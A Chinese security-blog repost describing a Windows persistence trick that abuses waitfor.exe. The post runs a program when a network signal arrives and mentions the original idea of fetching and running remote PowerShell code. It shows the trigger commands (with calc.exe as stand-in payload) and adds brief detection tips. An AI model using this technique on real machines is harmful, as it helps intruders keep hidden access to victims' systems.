【Tips+1】Windows持久化之waitfor

admin 2023年11月20日21:21:50评论11 views字数 1052阅读3分30秒阅读模式

实现原理

waitfor 后门权限维持最初来之Daniel Bohannon‏ @danielhbohannon在twitter上分享了他的利用思路:将waitfor接收信号后的操作设置为从远程服务器下载powershell代码并执行。地址如下:

 

Waitfor.exe简介是用来同步网络中计算机,可以发送或等待系统上的信号

Windows Server 2003Windows VistaWindows XPWindows Server 2008Windows 7Windows Server 2003 with SP2Windows Server 2003 R2Windows Server 2008 R2Windows Server 2000Windows Server 2012Windows Server 2003 with SP1Windows 8Windows 10其他Server系统未测试,理论上支持

操作步骤

waitfor:在系统上发送或等待信号。waitfor可用于跨网络同步计算机。

waitfor test && c:\windows\system32calc.exe 表示接收信号成功后执行恶意exe程序
waitfor /s 127.0.0.1 /si test
或
waitfor /s 127.0.0.1 /u test /p 123456 /si test   //向机器192.168.1.10发送信息,让其执行恶意程序

/s <Computer> 指定远程计算机的名称或IP地址,默认为本地计算机
/u [<Domain>]<user> 使用指定用户帐户的凭据运行脚本。默认是使用当前用户的凭据。
/p <Password> 指定/u参数中指定的用户帐户的密码。
/si 发送指定激活信号。
/t 指定等待信号的秒数。默认为无限期等待。
<SignalName> 指定等待或发送的信号,不区分大小写,长度不能超过225个字符

【Tips+1】Windows持久化之waitfor

该方法的优点就是能主动激活,但是缺点也明显就是只能在同一网段才能接收和发送激活信号、服务器重启之后就不行了。

如何排查

留意后台进程waitfor.exe

对于后台的可疑进程cmd.exe和powershell.exe,可使用Process Explorer查看其启动

【Tips+1】Windows持久化之waitfor

参考链接:https://mp.weixin.qq.com/s/g2niEfHd9smJrvpAHd9W-w

 

原文始发于微信公众号(贝雷帽SEC):【Tips+1】Windows持久化之waitfor

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月20日21:21:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【Tips+1】Windows持久化之waitfor https://cn-sec.com/archives/2220939.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: